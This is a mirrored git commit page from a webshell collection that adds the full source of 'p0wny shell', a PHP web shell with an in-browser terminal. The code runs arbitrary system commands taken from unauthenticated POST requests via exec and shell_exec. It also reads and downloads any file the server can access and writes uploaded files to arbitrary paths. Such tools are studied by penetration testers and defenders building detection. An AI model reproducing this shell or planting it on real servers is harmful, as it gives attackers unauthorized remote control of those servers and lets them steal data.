mirror of
https://github.com/BlackArch/webshells
synced 2024-11-10 06:14:16 +00:00
adding p0wny shell
This commit is contained in:
parent
97d532ca62
commit
39b29d699b
1 changed files with 412 additions and 0 deletions
412
php/p0wny_shell.php
Normal file
412
php/p0wny_shell.php
Normal file
|
@ -0,0 +1,412 @@
|
|||
<?php
|
||||
function featureShell($cmd, $cwd) {
|
||||
$stdout = array();
|
||||
if (preg_match("/^\s*cd\s*$/", $cmd)) {
|
||||
// pass
|
||||
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
|
||||
chdir($cwd);
|
||||
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||
chdir($match[1]);
|
||||
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
|
||||
chdir($cwd);
|
||||
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||
return featureDownload($match[1]);
|
||||
} else {
|
||||
chdir($cwd);
|
||||
exec($cmd, $stdout);
|
||||
}
|
||||
return array(
|
||||
"stdout" => $stdout,
|
||||
"cwd" => getcwd()
|
||||
);
|
||||
}
|
||||
function featurePwd() {
|
||||
return array("cwd" => getcwd());
|
||||
}
|
||||
function featureHint($fileName, $cwd, $type) {
|
||||
chdir($cwd);
|
||||
if ($type == 'cmd') {
|
||||
$cmd = "compgen -c $fileName";
|
||||
} else {
|
||||
$cmd = "compgen -f $fileName";
|
||||
}
|
||||
$cmd = "/bin/bash -c \"$cmd\"";
|
||||
$files = explode("\n", shell_exec($cmd));
|
||||
return array(
|
||||
'files' => $files,
|
||||
);
|
||||
}
|
||||
function featureDownload($filePath) {
|
||||
$file = @file_get_contents($filePath);
|
||||
if ($file === FALSE) {
|
||||
return array(
|
||||
'stdout' => array('File not found / no read permission.'),
|
||||
'cwd' => getcwd()
|
||||
);
|
||||
} else {
|
||||
return array(
|
||||
'name' => basename($filePath),
|
||||
'file' => base64_encode($file)
|
||||
);
|
||||
}
|
||||
}
|
||||
function featureUpload($path, $file, $cwd) {
|
||||
chdir($cwd);
|
||||
$f = @fopen($path, 'wb');
|
||||
if ($f === FALSE) {
|
||||
return array(
|
||||
'stdout' => array('Invalid path / no write permission.'),
|
||||
'cwd' => getcwd()
|
||||
);
|
||||
} else {
|
||||
fwrite($f, base64_decode($file));
|
||||
fclose($f);
|
||||
return array(
|
||||
'stdout' => array('Done.'),
|
||||
'cwd' => getcwd()
|
||||
);
|
||||
}
|
||||
}
|
||||
if (isset($_GET["feature"])) {
|
||||
$response = NULL;
|
||||
switch ($_GET["feature"]) {
|
||||
case "shell":
|
||||
$cmd = $_POST['cmd'];
|
||||
if (!preg_match('/2>/', $cmd)) {
|
||||
$cmd .= ' 2>&1';
|
||||
}
|
||||
$response = featureShell($cmd, $_POST["cwd"]);
|
||||
break;
|
||||
case "pwd":
|
||||
$response = featurePwd();
|
||||
break;
|
||||
case "hint":
|
||||
$response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);
|
||||
break;
|
||||
case 'upload':
|
||||
$response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);
|
||||
}
|
||||
header("Content-Type: application/json");
|
||||
echo json_encode($response);
|
||||
die();
|
||||
}
|
||||
?><!DOCTYPE html>
|
||||
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta charset="UTF-8" />
|
||||
<title>p0wny@shell:~#</title>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
||||
<style>
|
||||
html, body {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
background: #333;
|
||||
color: #eee;
|
||||
font-family: monospace;
|
||||
}
|
||||
#shell {
|
||||
background: #222;
|
||||
max-width: 800px;
|
||||
margin: 50px auto 0 auto;
|
||||
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
||||
font-size: 10pt;
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
align-items: stretch;
|
||||
}
|
||||
#shell-content {
|
||||
height: 500px;
|
||||
overflow: auto;
|
||||
padding: 5px;
|
||||
white-space: pre-wrap;
|
||||
flex-grow: 1;
|
||||
}
|
||||
#shell-logo {
|
||||
font-weight: bold;
|
||||
color: #FF4180;
|
||||
text-align: center;
|
||||
}
|
||||
@media (max-width: 991px) {
|
||||
#shell-logo {
|
||||
display: none;
|
||||
}
|
||||
html, body, #shell {
|
||||
height: 100%;
|
||||
width: 100%;
|
||||
max-width: none;
|
||||
}
|
||||
#shell {
|
||||
margin-top: 0;
|
||||
}
|
||||
}
|
||||
@media (max-width: 767px) {
|
||||
#shell-input {
|
||||
flex-direction: column;
|
||||
}
|
||||
}
|
||||
.shell-prompt {
|
||||
font-weight: bold;
|
||||
color: #75DF0B;
|
||||
}
|
||||
.shell-prompt > span {
|
||||
color: #1BC9E7;
|
||||
}
|
||||
#shell-input {
|
||||
display: flex;
|
||||
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
||||
border-top: rgba(255, 255, 255, .05) solid 1px;
|
||||
}
|
||||
#shell-input > label {
|
||||
flex-grow: 0;
|
||||
display: block;
|
||||
padding: 0 5px;
|
||||
height: 30px;
|
||||
line-height: 30px;
|
||||
}
|
||||
#shell-input #shell-cmd {
|
||||
height: 30px;
|
||||
line-height: 30px;
|
||||
border: none;
|
||||
background: transparent;
|
||||
color: #eee;
|
||||
font-family: monospace;
|
||||
font-size: 10pt;
|
||||
width: 100%;
|
||||
align-self: center;
|
||||
}
|
||||
#shell-input div {
|
||||
flex-grow: 1;
|
||||
align-items: stretch;
|
||||
}
|
||||
#shell-input input {
|
||||
outline: none;
|
||||
}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
var CWD = null;
|
||||
var commandHistory = [];
|
||||
var historyPosition = 0;
|
||||
var eShellCmdInput = null;
|
||||
var eShellContent = null;
|
||||
function _insertCommand(command) {
|
||||
eShellContent.innerHTML += "\n\n";
|
||||
eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> ';
|
||||
eShellContent.innerHTML += escapeHtml(command);
|
||||
eShellContent.innerHTML += "\n";
|
||||
eShellContent.scrollTop = eShellContent.scrollHeight;
|
||||
}
|
||||
function _insertStdout(stdout) {
|
||||
eShellContent.innerHTML += escapeHtml(stdout);
|
||||
eShellContent.scrollTop = eShellContent.scrollHeight;
|
||||
}
|
||||
function featureShell(command) {
|
||||
_insertCommand(command);
|
||||
if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
|
||||
featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
|
||||
} else if (/^\s*clear\s*$/.test(command)) {
|
||||
// Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
|
||||
eShellContent.innerHTML = '';
|
||||
} else {
|
||||
makeRequest("?feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
||||
if (response.hasOwnProperty('file')) {
|
||||
featureDownload(response.name, response.file)
|
||||
} else {
|
||||
_insertStdout(response.stdout.join("\n"));
|
||||
updateCwd(response.cwd);
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
function featureHint() {
|
||||
if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete
|
||||
function _requestCallback(data) {
|
||||
if (data.files.length <= 1) return; // no completion
|
||||
if (data.files.length === 2) {
|
||||
if (type === 'cmd') {
|
||||
eShellCmdInput.value = data.files[0];
|
||||
} else {
|
||||
var currentValue = eShellCmdInput.value;
|
||||
eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]);
|
||||
}
|
||||
} else {
|
||||
_insertCommand(eShellCmdInput.value);
|
||||
_insertStdout(data.files.join("\n"));
|
||||
}
|
||||
}
|
||||
var currentCmd = eShellCmdInput.value.split(" ");
|
||||
var type = (currentCmd.length === 1) ? "cmd" : "file";
|
||||
var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];
|
||||
makeRequest(
|
||||
"?feature=hint",
|
||||
{
|
||||
filename: fileName,
|
||||
cwd: CWD,
|
||||
type: type
|
||||
},
|
||||
_requestCallback
|
||||
);
|
||||
}
|
||||
function featureDownload(name, file) {
|
||||
var element = document.createElement('a');
|
||||
element.setAttribute('href', 'data:application/octet-stream;base64,' + file);
|
||||
element.setAttribute('download', name);
|
||||
element.style.display = 'none';
|
||||
document.body.appendChild(element);
|
||||
element.click();
|
||||
document.body.removeChild(element);
|
||||
_insertStdout('Done.');
|
||||
}
|
||||
function featureUpload(path) {
|
||||
var element = document.createElement('input');
|
||||
element.setAttribute('type', 'file');
|
||||
element.style.display = 'none';
|
||||
document.body.appendChild(element);
|
||||
element.addEventListener('change', function () {
|
||||
var promise = getBase64(element.files[0]);
|
||||
promise.then(function (file) {
|
||||
makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
||||
_insertStdout(response.stdout.join("\n"));
|
||||
updateCwd(response.cwd);
|
||||
});
|
||||
}, function () {
|
||||
_insertStdout('An unknown client-side error occurred.');
|
||||
});
|
||||
});
|
||||
element.click();
|
||||
document.body.removeChild(element);
|
||||
}
|
||||
function getBase64(file, onLoadCallback) {
|
||||
return new Promise(function(resolve, reject) {
|
||||
var reader = new FileReader();
|
||||
reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };
|
||||
reader.onerror = reject;
|
||||
reader.readAsDataURL(file);
|
||||
});
|
||||
}
|
||||
function genPrompt(cwd) {
|
||||
cwd = cwd || "~";
|
||||
var shortCwd = cwd;
|
||||
if (cwd.split("/").length > 3) {
|
||||
var splittedCwd = cwd.split("/");
|
||||
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
||||
}
|
||||
return "p0wny@shell:<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
||||
}
|
||||
function updateCwd(cwd) {
|
||||
if (cwd) {
|
||||
CWD = cwd;
|
||||
_updatePrompt();
|
||||
return;
|
||||
}
|
||||
makeRequest("?feature=pwd", {}, function(response) {
|
||||
CWD = response.cwd;
|
||||
_updatePrompt();
|
||||
});
|
||||
}
|
||||
function escapeHtml(string) {
|
||||
return string
|
||||
.replace(/&/g, "&")
|
||||
.replace(/</g, "<")
|
||||
.replace(/>/g, ">");
|
||||
}
|
||||
function _updatePrompt() {
|
||||
var eShellPrompt = document.getElementById("shell-prompt");
|
||||
eShellPrompt.innerHTML = genPrompt(CWD);
|
||||
}
|
||||
function _onShellCmdKeyDown(event) {
|
||||
switch (event.key) {
|
||||
case "Enter":
|
||||
featureShell(eShellCmdInput.value);
|
||||
insertToHistory(eShellCmdInput.value);
|
||||
eShellCmdInput.value = "";
|
||||
break;
|
||||
case "ArrowUp":
|
||||
if (historyPosition > 0) {
|
||||
historyPosition--;
|
||||
eShellCmdInput.blur();
|
||||
eShellCmdInput.focus();
|
||||
eShellCmdInput.value = commandHistory[historyPosition];
|
||||
}
|
||||
break;
|
||||
case "ArrowDown":
|
||||
if (historyPosition >= commandHistory.length) {
|
||||
break;
|
||||
}
|
||||
historyPosition++;
|
||||
if (historyPosition === commandHistory.length) {
|
||||
eShellCmdInput.value = "";
|
||||
} else {
|
||||
eShellCmdInput.blur();
|
||||
eShellCmdInput.focus();
|
||||
eShellCmdInput.value = commandHistory[historyPosition];
|
||||
}
|
||||
break;
|
||||
case 'Tab':
|
||||
event.preventDefault();
|
||||
featureHint();
|
||||
break;
|
||||
}
|
||||
}
|
||||
function insertToHistory(cmd) {
|
||||
commandHistory.push(cmd);
|
||||
historyPosition = commandHistory.length;
|
||||
}
|
||||
function makeRequest(url, params, callback) {
|
||||
function getQueryString() {
|
||||
var a = [];
|
||||
for (var key in params) {
|
||||
if (params.hasOwnProperty(key)) {
|
||||
a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key]));
|
||||
}
|
||||
}
|
||||
return a.join("&");
|
||||
}
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", url, true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState === 4 && xhr.status === 200) {
|
||||
try {
|
||||
var responseJson = JSON.parse(xhr.responseText);
|
||||
callback(responseJson);
|
||||
} catch (error) {
|
||||
alert("Error while parsing response: " + error);
|
||||
}
|
||||
}
|
||||
};
|
||||
xhr.send(getQueryString());
|
||||
}
|
||||
window.onload = function() {
|
||||
eShellCmdInput = document.getElementById("shell-cmd");
|
||||
eShellContent = document.getElementById("shell-content");
|
||||
updateCwd();
|
||||
eShellCmdInput.focus();
|
||||
};
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div id="shell">
|
||||
<pre id="shell-content">
|
||||
<div id="shell-logo">
|
||||
___ ____ _ _ _ _ _ <span></span>
|
||||
_ __ / _ \__ ___ __ _ _ / __ \ ___| |__ ___| | |_ /\/|| || |_ <span></span>
|
||||
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_ .. _|<span></span>
|
||||
| |_) | |_| |\ V V /| | | | |_| | | (_| \__ \ | | | __/ | |_ |_ _|<span></span>
|
||||
| .__/ \___/ \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_) |_||_| <span></span>
|
||||
|_| |___/ \____/ <span></span>
|
||||
</div>
|
||||
</pre>
|
||||
<div id="shell-input">
|
||||
<label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
|
||||
<div>
|
||||
<input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
|
||||
</html>
|
Loading…
Reference in a new issue